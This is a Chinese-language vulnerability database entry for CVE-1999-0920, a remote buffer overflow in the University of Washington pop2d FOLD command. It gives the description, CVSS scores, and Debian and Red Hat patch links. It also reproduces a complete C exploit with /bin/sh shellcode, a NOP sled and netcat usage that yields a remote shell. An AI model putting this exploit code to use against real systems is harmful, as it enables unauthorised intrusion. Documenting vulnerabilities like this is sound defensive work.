CVE-1999-0920
CVSS10.0
发布时间 :1999-05-26 00:00:00
修订时间 :2008-09-09 08:36:10
NMCOE    

[原文]Buffer overflow in the pop-2d POP daemon in the IMAP package allows remote attackers to gain privileges via the FOLD command.


[CNNVD]UW pop2d FOLD命令远程缓冲区溢出漏洞(CNNVD-199905-048)

        
        pop2d是University of Washington实现的一个开放源码的POP服务器。
        pop2d 4.4及以前版本存在一个缓冲区溢出漏洞,恶意的远程攻击者可以利用该漏洞获得主机的"nobody"用户权限。
        pop2和pop3服务器支持"anonymous proxy",远程用户可以用这个指令打开其它有合法账号服务器的IMAP mailbox。登陆以后,FOLD命令的一个参数会引起基于堆栈的缓冲溢出。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_washington:pop2d
cpe:/a:university_of_washington:imap:4.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0920
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0920
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199905-048
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/283
(UNKNOWN)  BID  283

- 漏洞信息

UW pop2d FOLD命令远程缓冲区溢出漏洞
危急 边界条件错误
1999-05-26 00:00:00 2005-05-02 00:00:00
远程  
        
        pop2d是University of Washington实现的一个开放源码的POP服务器。
        pop2d 4.4及以前版本存在一个缓冲区溢出漏洞,恶意的远程攻击者可以利用该漏洞获得主机的"nobody"用户权限。
        pop2和pop3服务器支持"anonymous proxy",远程用户可以用这个指令打开其它有合法账号服务器的IMAP mailbox。登陆以后,FOLD命令的一个参数会引起基于堆栈的缓冲溢出。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时关闭pop2d服务
        在/etc/inetd.conf中注释掉ipop2d行:
        #pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
        然后重起inetd服务。
        厂商补丁:
        Debian
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Source archives:
        
        http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.diff.gz

        MD5 checksum: 606f893869069eee68f4c1e31392af29
        
        http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.dsc

        MD5 checksum: 93ed80a3619586ff9f3246003aca2448
        
        http://security.debian.org/dists/stable/updates/source/imap_4.5.orig.tar.gz

        MD5 checksum: 59afe4be5fcd17c20d241633a4a3d0ac
        Sun Sparc architecture:
        
        http://security.debian.org/dists/stable/updates/binary-sparc/c-client-dev_4.5-0slink2_sparc.deb

        MD5 checksum: 2de5363a3ea9f27c1aa064c3102567cc
        
        http://security.debian.org/dists/stable/updates/binary-sparc/imap_4.5-0slink2_sparc.deb

        MD5 checksum: 87638b6ad06094f30ff6d2dddfd10b8b
        
        http://security.debian.org/dists/stable/updates/binary-sparc/ipopd_4.5-0slink2_sparc.deb

        MD5 checksum: aa6621e2f7e2df751489c397e9e169a8
        Intel ia32 architecture:
        
        http://security.debian.org/dists/stable/updates/binary-i386/c-client-dev_4.5-0slink2_i386.deb

        MD5 checksum: fd92656c7281a4d8322b6da1285475cd
        
        http://security.debian.org/dists/stable/updates/binary-i386/imap_4.5-0slink2_i386.deb

        MD5 checksum: c92eaece7e431c84708909362afad07d
        
        http://security.debian.org/dists/stable/updates/binary-i386/ipopd_4.5-0slink2_i386.deb

        MD5 checksum: 29685847b0eef8307383a428b1d02be2
        Motorola 680x0 architecture:
        
        http://security.debian.org/dists/stable/updates/binary-m68k/c-client-dev_4.5-0slink2_m68k.deb

        MD5 checksum: eeab449299e9f2d3fc97db69110b4432
        
        http://security.debian.org/dists/stable/updates/binary-m68k/imap_4.5-0slink2_m68k.deb

        MD5 checksum: 4bd0fbaa392b6013f6caa33b04578764
        
        http://security.debian.org/dists/stable/updates/binary-m68k/ipopd_4.5-0slink2_m68k.deb

        MD5 checksum: d43f502971afc531923903f3ac7b5b3f
        Alpha architecture:
        
        http://security.debian.org/dists/stable/updates/binary-alpha/c-client-dev_4.5-0slink2_alpha.deb

        MD5 checksum: 6732ae9495ee29590ed85cc482fbda97
        
        http://security.debian.org/dists/stable/updates/binary-alpha/imap_4.5-0slink2_alpha.deb

        MD5 checksum: d0ee05b972d5d1bc1d066e2bae4d8c8b
        
        http://security.debian.org/dists/stable/updates/binary-alpha/ipopd_4.5-0slink2_alpha.deb

        MD5 checksum: 89c3931092537d0eb23fb50fa57f1bb0
        RedHat
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Red Hat Linux 4.x:
        ------------------
        On alpha:
        rpm -Uvh ftp://updates.redhat.com/4.2/alpha/imap-4.5-0.4.2.alpha.rpm
        On i386:
        rpm -Uvh ftp://updates.redhat.com/4.2/i386/imap-4.5-0.4.2.i386.rpm
        On sparc:
        rpm -Uvh ftp://updates.redhat.com/4.2/sparc/imap-4.5-0.4.2.sparc.rpm
        The source is available at
        ftp://updates.redhat.com/4.2/SRPMS/imap-4.5-0.4.2.src.rpm
        Red Hat Linux 5.x:
        ------------------
        On alpha:
        rpm -Uvh ftp://updates.redhat.com/5.2/alpha/imap-4.5-0.5.2.alpha.rpm
        On i386:
        rpm -Uvh ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm
        On sparc:
        rpm -Uvh ftp://updates.redhat.com/5.2/sparc/imap-4.5-0.5.2.sparc.rpm
        The source is available at
        ftp://updates.redhat.com/5.2/SRPMS/imap-4.5-0.5.2.src.rpm

- 漏洞信息 (19226)

University of Washington pop2d 4.4 Buffer Overflow Vulnerability (EDBID:19226)
linux remote
1999-05-26 Verified
0 Chris Evans
N/A [点击下载]
source: http://www.securityfocus.com/bid/283/info

A buffer overflow vulnerability in pop2d version 4.4 or earlier allow malicious remote users to obtain access to the "nobody" user account.

The pop2 and pop3 servers support the concept of an "anonymous proxy", whereby a remote user connecting to the server can instruct it to open an IMAP mailbox on some other saver they have a valid account on. In this state the pop2 server runs under the "nobody" user id.

Once logged on, issuing a FOLD command with an argument of about 1000 bytes will cause a stack based buffer overflow. 

/*
 * Sekure SDI (Brazilian Information Security Team)
 * ipop2d remote exploit for linux (Jun, 02 1999)
 *
 * by c0nd0r <condor@sekure.org>
 *
 *  (read the instructions below)
 *
 *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
 *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
 *            also to #uground (irc.brasnet.org) and #SDI (efnet),
 *            guys at el8.org, toxyn.org, pulhas.org
 *
 *  Sincere Apologizes: duke (for the mistake we made with the wu-expl),
 *                     your code rocks.
 *
 *  Usage:
 *
 *    SDI-pop2 <imap_server> <user> <pass> [offset]
 *
 *   where  imap_server = IMAP server at your box (or other place as well)
 *          user = any account at your box
 *          pass = the account's password
 *          offset = 0 is default -- increase if it's necessary.
 *
 *  Example: (netcat rocks)
 *
 *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
 *
 *  ----------------------------------------------------------------
 *  HOWTO-exploit:
 *
 *   In order to gain remote access as user nobody, you should set
 *   an IMAP server at your box (just edit the inetd.conf) or at
 *   any other machine which you have an account.
 *
 *   During the anonymous_login() function, the ipop2d will set the
 *   uid to user nobody, so you are not going to get a rootshell.
 *  ----------------------------------------------------------------
 *
 *  We do NOT take any responsability for the consequences of using
 *  this code -- you've been warned! don't be a script k1dd13!
 *
 */


#include <stdio.h>

/*
 *  (shellcode)
 * 
 *       jmp   0x1f
 *       popl  %esi
 *       movl  %esi,0x8(%esi)
 *       xorl  %eax,%eax
 *       movb  %eax,0x7(%esi)
 *       movl  %eax,0xc(%esi)
 *       movb  $0xb,%al
 *       movl  %esi,%ebx
 *       leal  0x8(%esi),%ecx
 *       leal  0xc(%esi),%edx
 *       int   $0x80
 *       xorl  %ebx,%ebx
 *       movl  %ebx,%eax
 *       inc   %eax
 *       int   $0x80
 *       call  -0x24
 *       .string \"/bin/sh\"
 * grab your shellcode generator at www.sekure.org
 */

char c0d3[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";
 

main (int argc, char *argv[] ) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 char host[255], user[255], pass[255];
 int bsize=986;
 
 if ( argc < 4) {
  printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  exit (0);
 }
  
 snprintf ( host, sizeof(host), "%s", argv[1]);
 snprintf ( user, sizeof(user), "%s", argv[2]);
 snprintf ( pass, sizeof(pass), "%s", argv[3]);
 
 if ( argc > 4) offset = atoi ( argv[4]);
 /* gimme the ret + offset */
 addr = 0xbffff3c0 + offset; 
 fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
 
 /* calculation of the return address position */
 bsize -= strlen ( host);
 
 for ( x = 0; x < bsize-strlen(c0d3); x++)
  buf[x] = 0x90;
 
 for ( y = 0; y < strlen(c0d3); x++, y++)
  buf[x] = c0d3[y]; 
 
 for (  ; x < 1012; x+=4) { 
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 }
        
 sleep (1);
 printf ( "HELO %s:%s %s\r\n", host, user, pass);
 sleep (1);
 printf ( "FOLD %s\r\n", buf);

}

		

- 漏洞信息

104
IMAP pop-2d POP Daemon FOLD Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-05-26 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站